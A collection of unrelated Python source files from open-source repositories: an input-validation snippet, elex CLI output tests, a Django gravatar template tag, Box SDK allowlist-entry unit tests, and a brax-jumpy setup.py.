if __name__ == '__main__':
sys.exit(InstructionTestGen.main());
|
misc/validateInput.py | viju4you/Python | 110 | 19090 | # Validate input
while True:
print('Enter your age:')
age = input()
if age.isdecimal():
break
print('Please enter a number for your age.')
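# Once the loop exits, age is guaranteed to be decimal text, so a conversion such
# as int(age) is safe (illustrative follow-up, not part of the original snippet).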
|
tests/test_cli.py | jameswilkerson/elex | 183 | 19094 |
import csv
import sys
import json
import tests
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
from six import with_metaclass
from elex.cli.app import ElexApp
from collections import OrderedDict
DATA_FILE = 'tests/data/20151103_national.json'
DATA_ELECTION_DATE = '2015-11-03'
DELSUM_DATA_FILE = 'tests/data/20160118_delsum.json'
DELSUPER_DATA_FILE = 'tests/data/20160118_delsuper.json'
ELECTIONS_DATA_FILE = 'tests/data/00000000_elections.json'
DISTRICT_DATA_FILE = 'tests/data/20160201_district_results.json'
TEST_COMMANDS = [
'races',
'candidates',
'reporting-units',
'candidate-reporting-units',
'results',
]
class ElexCLICSVTestMeta(type):
def __new__(mcs, name, bases, dict):
def gen_fields_test(command):
"""
Dynamically generate a fields test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
api_fields = api_data[0].serialize().keys()
self.assertEqual(cli_fields, list(api_fields))
return test
def gen_length_test(command):
"""
Dynamically generate a data length test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
self.assertEqual(len(cli_data), len(api_data))
return test
def gen_data_test(command):
"""
Dynamically generate a data test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
for i, row in enumerate(cli_data):
for k, v in api_data[i].serialize().items():
if v is None:
v = ''
self.assertEqual(row[k], str(v))
return test
def gen_timestamp_test(command):
"""
Generate test to ensure timestamp field is set
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
with_timestamp=True)
self.assertEqual(cli_fields[-1], 'timestamp')
return test
def gen_timestamp_data_test(command):
"""
Generate test to ensure timestamp values are numeric
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
with_timestamp=True)
for row in cli_data:
try:
self.assertTrue(unicode(row['timestamp']).isnumeric())
except NameError:
self.assertTrue(str(row['timestamp']).isnumeric())
return test
def gen_batch_name_data_test(command):
"""
Generate test to ensure batch name is set
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
batch_name='batch-01')
for row in cli_data:
self.assertEqual(row['batchname'], 'batch-01')
return test
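# For every CLI command the loop below attaches one generated method per aspect,
# producing test names of the form test_csv_<command>_<aspect>.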
for command in TEST_COMMANDS:
fields_test_name = 'test_csv_{0}_fields'.format(
command.replace('-', '_')
)
dict[fields_test_name] = gen_fields_test(command)
length_test_name = 'test_csv_{0}_length'.format(
command.replace('-', '_')
)
dict[length_test_name] = gen_length_test(command)
data_test_name = 'test_csv_{0}_data'.format(
command.replace('-', '_')
)
dict[data_test_name] = gen_data_test(command)
timestamp_test_name = 'test_csv_{0}_timestamp'.format(
command.replace('-', '_')
)
dict[timestamp_test_name] = gen_timestamp_test(command)
timestamp_data_test_name = 'test_csv_{0}_timestamp_data'.format(
command.replace('-', '_')
)
dict[timestamp_data_test_name] = gen_timestamp_data_test(command)
batch_name_data_test_name = 'test_csv_{0}_batch_name_data'.format(
command.replace('-', '_')
)
dict[batch_name_data_test_name] = gen_batch_name_data_test(command)
return type.__new__(mcs, name, bases, dict)
class ElexCLICSVTestCase(
with_metaclass(ElexCLICSVTestMeta, tests.ElectionResultsTestCase)
):
"""
This testing class is mostly dynamically generated by its metaclass.
    The goal of the CLI tests is to make sure the CLI output matches the
Python API. The API tests guarantee the validity of the data, while these
tests guarantee the CLI provides the same data in CSV format.
"""
def test_csv_elections_fields(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(
fields,
['id', 'electiondate', 'liveresults', 'testresults']
)
def test_csv_elections_length(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(len(data), 11)
def test_csv_elections_date(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['electiondate'], '2015-08-04')
def test_csv_elections_liveresults(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['liveresults'], 'False')
def test_csv_elections_testresults(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['testresults'], 'True')
def test_csv_next_election_fields(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(
fields,
['id', 'electiondate', 'liveresults', 'testresults']
)
def test_csv_next_election_length(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(len(data), 1)
def test_csv_next_election_date(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['electiondate'], '2015-08-25')
def test_csv_next_election_liveresults(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['liveresults'], 'True')
def test_csv_next_election_testresults(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['testresults'], 'False')
def test_csv_delegate_fields(self):
fields, data = self._test_command(command='delegates')
self.assertEqual(
fields,
[
'level', 'party_total', 'superdelegates_count', 'last',
'state', 'candidateid', 'party_need', 'party',
'delegates_count', 'id', 'd1', 'd7', 'd30'
]
)
def test_csv_delegate_state_count(self):
fields, data = self._test_command(command='delegates')
number_of_states = list(
set([d['state'] for d in data if d['level'] == 'state'])
)
self.assertEqual(58, len(number_of_states))
def test_csv_results_resultslevel(self):
fields, data = self._test_command(
command='results',
datafile=DISTRICT_DATA_FILE,
resultslevel='district'
)
self.assertEqual(data[17]['reportingunitname'], 'District 1')
def _test_command(
self,
command,
datafile=DATA_FILE,
delsum_datafile=DELSUM_DATA_FILE,
delsuper_datafile=DELSUPER_DATA_FILE,
electiondate=DATA_ELECTION_DATE,
resultslevel=None,
with_timestamp=False,
batch_name=False
):
"""
Execute an `elex` sub-command; returns fieldnames and rows
"""
stdout_backup = sys.stdout
sys.stdout = StringIO()
argv = [command]
if electiondate is not None:
argv.append(electiondate)
argv = argv + ['--data-file', datafile]
argv = argv + ['--delegate-sum-file', delsum_datafile]
argv = argv + ['--delegate-super-file', delsuper_datafile]
argv = argv + ['--results-level', resultslevel]
if with_timestamp:
argv = argv + ['--with-timestamp']
if batch_name:
argv = argv + ['--batch-name', batch_name]
app = ElexApp(argv=argv)
app.setup()
app.log.set_level('FATAL')
app.run()
lines = sys.stdout.getvalue().split('\n')
reader = csv.DictReader(lines)
sys.stdout.close()
sys.stdout = stdout_backup
return reader.fieldnames, list(reader)
class ElexCLIJSONTestMeta(type):
def __new__(mcs, name, bases, dict):
def gen_fields_test(command):
"""
Dynamically generate a fields test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
api_fields = api_data[0].serialize().keys()
self.assertEqual(cli_fields, list(api_fields))
return test
def gen_length_test(command):
"""
Dynamically generate a data length test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
self.assertEqual(len(cli_data), len(api_data))
return test
def gen_data_test(command):
"""
Dynamically generate a data test
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command)
api_data = getattr(self, command.replace('-', '_'))
for i, row in enumerate(cli_data):
for k, v in api_data[i].serialize().items():
self.assertEqual(row[k], v)
return test
def gen_timestamp_test(command):
"""
Generate test to ensure timestamp field is set
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
with_timestamp=True)
self.assertEqual(cli_fields[-1], 'timestamp')
return test
def gen_timestamp_data_test(command):
"""
Generate test to ensure timestamp data is an integer
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
with_timestamp=True)
for row in cli_data:
try:
self.assertTrue(unicode(row['timestamp']).isnumeric())
except NameError:
self.assertTrue(str(row['timestamp']).isnumeric())
return test
def gen_batch_name_data_test(command):
"""
            Generate test to ensure batch name is set on every row
"""
def test(self):
cli_fields, cli_data = self._test_command(command=command,
batch_name='batch-01')
for row in cli_data:
self.assertEqual(row['batchname'], 'batch-01')
return test
for command in TEST_COMMANDS:
fields_test_name = 'test_json_{0}_fields'.format(
command.replace('-', '_')
)
dict[fields_test_name] = gen_fields_test(command)
length_test_name = 'test_json_{0}_length'.format(
command.replace('-', '_')
)
dict[length_test_name] = gen_length_test(command)
data_test_name = 'test_json_{0}_data'.format(
command.replace('-', '_')
)
dict[data_test_name] = gen_data_test(command)
            timestamp_test_name = 'test_json_{0}_timestamp'.format(
                command.replace('-', '_')
            )
            dict[timestamp_test_name] = gen_timestamp_test(command)
timestamp_data_test_name = 'test_json_{0}_timestamp_data'.format(
command.replace('-', '_')
)
dict[timestamp_data_test_name] = gen_timestamp_data_test(command)
            batch_name_data_test_name = 'test_json_{0}_batch_name_data'.format(
command.replace('-', '_')
)
dict[batch_name_data_test_name] = gen_batch_name_data_test(command)
return type.__new__(mcs, name, bases, dict)
class ElexCLIJSONTestCase(
with_metaclass(ElexCLIJSONTestMeta, tests.ElectionResultsTestCase)
):
"""
This testing class is mostly dynamically generated by its metaclass.
    The goal of the CLI tests is to make sure the CLI output matches the
Python API. The API tests guarantee the validity of the data, while these
tests guarantee the CLI provides the same data in JSON format.
"""
def test_json_elections_fields(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(
fields,
['id', 'electiondate', 'liveresults', 'testresults']
)
def test_json_elections_length(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(len(data), 11)
def test_json_elections_date(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['electiondate'], '2015-08-04')
def test_json_elections_liveresults(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['liveresults'], False)
def test_json_elections_testresults(self):
fields, data = self._test_command(
command='elections',
datafile=ELECTIONS_DATA_FILE
)
self.assertEqual(data[4]['testresults'], True)
def test_json_next_election_fields(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(
fields,
['id', 'electiondate', 'liveresults', 'testresults']
)
def test_json_next_election_length(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(len(data), 1)
def test_json_next_election_date(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['electiondate'], '2015-08-25')
def test_json_next_election_liveresults(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['liveresults'], True)
def test_json_next_election_testresults(self):
fields, data = self._test_command(
command='next-election',
datafile=ELECTIONS_DATA_FILE,
electiondate='2015-08-04'
)
self.assertEqual(data[0]['testresults'], False)
def test_json_delegate_fields(self):
fields, data = self._test_command(command='delegates')
self.assertEqual(
fields,
[
'level', 'party_total', 'superdelegates_count', 'last',
'state', 'candidateid', 'party_need', 'party',
'delegates_count', 'id', 'd1', 'd7', 'd30'
]
)
def test_json_delegate_state_count(self):
fields, data = self._test_command(command='delegates')
number_of_states = list(
set([d['state'] for d in data if d['level'] == 'state'])
)
self.assertEqual(58, len(number_of_states))
def test_json_results_resultslevel(self):
fields, data = self._test_command(
command='results',
datafile=DISTRICT_DATA_FILE,
resultslevel='district'
)
self.assertEqual(data[17]['reportingunitname'], 'District 1')
def _test_command(
self,
command,
datafile=DATA_FILE,
delsum_datafile=DELSUM_DATA_FILE,
delsuper_datafile=DELSUPER_DATA_FILE,
electiondate=DATA_ELECTION_DATE,
resultslevel=None,
with_timestamp=False,
batch_name=False
):
"""
Execute an `elex` sub-command; returns fieldnames and rows
"""
stdout_backup = sys.stdout
sys.stdout = StringIO()
argv = [command]
        if electiondate is not None:
            argv.append(electiondate)
argv = argv + ['--data-file', datafile, '-o', 'json']
argv = argv + ['--delegate-sum-file', delsum_datafile]
argv = argv + ['--delegate-super-file', delsuper_datafile]
argv = argv + ['--results-level', resultslevel]
if with_timestamp:
argv = argv + ['--with-timestamp']
if batch_name:
argv = argv + ['--batch-name', batch_name]
app = ElexApp(argv=argv)
app.setup()
app.log.set_level('FATAL')
app.run()
json_data = sys.stdout.getvalue()
data = json.loads(json_data, object_pairs_hook=OrderedDict)
sys.stdout.close()
sys.stdout = stdout_backup
return list(data[0].keys()), data
|
resrc/utils/templatetags/gravatar.py | theWhiteFox/resrc | 274 | 19124 | # -*- coding: utf-8 -*-
from django import template
import urllib
import hashlib
register = template.Library()
def gravatar(email, size=80, username=None):
gravatar_url = "http://www.gravatar.com/avatar.php?"
gravatar_url += urllib.urlencode({
'gravatar_id': hashlib.md5(email).hexdigest(),
'size': str(size)
})
if username is not None:
return """<img src="%s" alt="gravatar for %s" />""" % (gravatar_url, username)
else:
return """<img src="%s" alt="gravatar" />""" % (gravatar_url)
register.simple_tag(gravatar)
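# Rough Python 3 sketch (an assumption, not part of the original tag): the same
# URL can be built with urllib.parse and a bytes-encoded email, e.g.
#
#   from urllib.parse import urlencode
#   digest = hashlib.md5(email.strip().lower().encode('utf-8')).hexdigest()
#   gravatar_url = 'https://www.gravatar.com/avatar/' + digest + '?' + urlencode({'size': str(size)})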
|
test/unit/object/test_collaboration_allowlist_entry.py | box/box-python-sdk | 367 | 19142 | <gh_stars>100-1000
# coding: utf-8
from __future__ import unicode_literals, absolute_import
from boxsdk.config import API
def test_get(mock_box_session, test_collaboration_allowlist_entry):
entry_id = test_collaboration_allowlist_entry.object_id
expected_url = '{0}/collaboration_whitelist_entries/{1}'.format(API.BASE_API_URL, entry_id)
mock_entry = {
'type': 'collaboration_whitelist_entry',
'id': '98765',
'domain': 'example.com',
'direction': 'inbound'
}
mock_box_session.get.return_value.json.return_value = mock_entry
entry = test_collaboration_allowlist_entry.get()
mock_box_session.get.assert_called_once_with(expected_url, headers=None, params=None)
assert entry.id == mock_entry['id']
assert entry.domain == mock_entry['domain']
assert entry.direction == mock_entry['direction']
def test_delete(mock_box_session, test_collaboration_allowlist_entry):
entry_id = test_collaboration_allowlist_entry.object_id
expected_url = '{0}/collaboration_whitelist_entries/{1}'.format(API.BASE_API_URL, entry_id)
test_collaboration_allowlist_entry.delete()
mock_box_session.delete.assert_called_once_with(expected_url, expect_json_response=False, headers=None, params={})
|
jumpy/setup.py | bharadwaj1098/brax | 1,162 | 19143 | <filename>jumpy/setup.py
# Copyright 2021 The Brax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""setup.py for Jumpy.
Install for development:
  pip install -e .
"""
from setuptools import setup
setup(
name="brax-jumpy",
version="0.0.1",
description=("Common backend for JAX or numpy."),
author="Brax Authors",
author_email="<EMAIL>",
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="http://github.com/google/brax",
license="Apache 2.0",
py_modules=["jumpy"],
install_requires=[
"jax",
"jaxlib",
"numpy",
],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
)
|